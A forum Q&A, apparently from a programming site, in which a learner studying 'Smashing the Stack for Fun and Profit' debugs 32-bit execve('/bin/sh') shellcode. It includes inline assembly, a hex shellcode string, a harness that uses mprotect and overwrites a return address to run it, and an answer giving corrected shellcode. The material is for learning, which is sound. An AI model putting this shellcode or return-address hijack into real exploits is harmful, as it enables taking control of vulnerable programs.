hex code implementation for spawning a shell

Question

I am trying to implement the codes given in smashing the stack for fun and profit by Aleph to learn the basics of buffer overflow attacks.

Machine architecture: Ubuntu 12.10 64 bit

programs compiled using -m32 flag in gcc

So far, I have managed to spawn a shell using the assembly instructions. The next step is to convert those instructions into hexadecimal code, where I have encountered this problem. The assembly code for spawning the shell:

void main() {
     __asm__(
        "Start:"
        "jmp    CallCode\n\t"
        "CallPop:"                    
        "popl   %esi\n\t"
        "movl   %esi,0x8(%esp)\n\t"           
        "xorl   %eax,%eax\n\t"                
        "movb   %al,0x7(%esp)\n\t"      
        "movl   %eax,0xc(%esp)\n\t"           
        "movb   $0xb,%al\n\t"                 
        "movl   %esi,%ebx\n\t"                
        "leal   0x8(%esp),%ecx\n\t"           
        "leal   0xc(%esp),%edx\n\t"           
        "int    $0x80\n\t"                    
        "xorl   %ebx,%ebx\n\t"                
        "movl   %ebx,%eax\n\t"                
        "inc    %eax\n\t"                     
        "int    $0x80\n\t"
        "CallCode:"                   
        "call   CallPop\n\t"                    
        ".string \"/bin/sh\"\n\t"
        );
 }

Corresponding hex code is:

#include <sys/mman.h>
#include<stdio.h>

#define PAGE_SIZE 4096U

char shellcode[] = "\xeb\x24\x5e\x89\x74\x24\x08\x31\xc0\x88\x44\x24\x07\x89\x44\x24\x0c\xb0"
"\x0b\x89\xf3\x8d\x4c\x24\x08\x8d\x54\x24\x0c\xcd"
"\x80\x31\x89\xd8\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";


void test_shellcode() {

    int *ret;

    // The data section is non-executable
    // Change protection bits for the page containing our shellcode

    mprotect((void *)((unsigned int)shellcode & ~(PAGE_SIZE - 1)), 2 * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC);

    ret = (int*)((char *)&ret + 16);
    (*ret) = (int)shellcode;
}

int main() {
    test_shellcode();   
    return 0;
} 

A bit of analysis using GDB Debugger led me to these results:

(gdb) run
Starting program: /home/peps/CCPP/Hello/testsc3 

Program received signal SIGILL, Illegal instruction.
0x0804a067 in shellcode ()
(gdb) x/s 0x0804a067
0x804a067 <shellcode+39>:   "\377\377\377/bin/sh"

After applying breakpoints, I think the problem lies somewhere in the hex code, which I have not been able to figure out. Also, I don't seem to understand the context of Illegal instruction here.

Any help would be appreciated.

Answer 1

You made a couple of mistakes in your shellcode.

char shellcode[] = 
"\xeb\x24\x5e\x89\x74\x24\x08\x31"
"\xc0\x88\x44\x24\x07\x89\x44\x24"
"\x0c\xb0\x0b\x89\xf3\x8d\x4c\x24"
"\x08\x8d\x54\x24\x0c\xcd\x80\x31"
"\xdb\x89\xd8\x40\xcd\x80\xe8\xd7"
"\xff\xff\xff/bin/sh";